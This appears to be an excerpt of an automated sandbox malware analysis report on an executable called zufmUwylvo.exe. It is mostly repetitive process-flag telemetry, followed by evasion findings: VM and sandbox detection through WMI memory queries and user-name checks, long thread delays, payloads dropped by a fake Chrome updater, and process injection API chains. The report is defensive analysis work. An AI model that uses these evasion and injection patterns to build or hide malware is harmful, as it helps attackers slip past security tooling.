Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\choice.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\choice.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,

22_2_00007FF723DE10C0

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Memory allocated: 1B66BA30000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Memory allocated: 1B66D1D0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5793	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4068	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7258
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2395
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 3082
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 6916
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9816
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9863

Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\jscseoeoqftm.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_30-13986
Source: C:\Windows\System32\dwm.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_32-21270
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_31-13994
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_27-21202

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_22-445

Source: C:\Windows\System32\lsass.exe	API coverage: 7.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.8 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.3 %
